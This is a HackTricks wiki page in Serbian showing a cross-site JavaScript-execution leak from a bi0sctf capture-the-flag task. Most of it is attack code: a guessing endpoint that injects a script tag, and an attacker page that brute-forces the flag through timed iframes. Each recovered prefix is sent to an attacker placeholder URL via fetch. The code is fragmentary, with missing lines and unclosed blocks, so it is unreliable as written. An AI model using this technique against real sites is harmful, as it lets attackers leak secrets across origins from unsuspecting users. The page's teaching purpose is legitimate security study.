JavaScript Execution XS Leak
Reading time: 2 minutes
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
// Code that will try ${guess} as flag (need rest of the server code
app.get("/guessing", function (req, res) {
let guess = req.query.guess
let page = `<html>
function foo() {
// If not the flag this will be executed
<script src="${guess}&hint=foo()"></script>
Glavna stranica koja generiše iframe-ove za prethodnu /guessing
stranicu kako bi testirala svaku mogućnost
let candidateIsGood = false
let candidate = ""
let flag = "bi0sctf{"
let guessIndex = -1
let flagChars =
// this will get called from our iframe IF the candidate is WRONG
function foo() {
candidateIsGood = false
timerId = setInterval(() => {
if (candidateIsGood) {
flag = candidate
guessIndex = -1
fetch("<yours-goes-here>?flag=" + flag)
//Start with true and will be change to false if wrong
candidateIsGood = true
if (guessIndex >= flagChars.length) {
let guess = flagChars[guessIndex]
candidate = flag + guess
let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(
console.log("iframe: ", iframe)
hack.innerHTML = iframe
}, 500)
<div id="hack"></div>
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.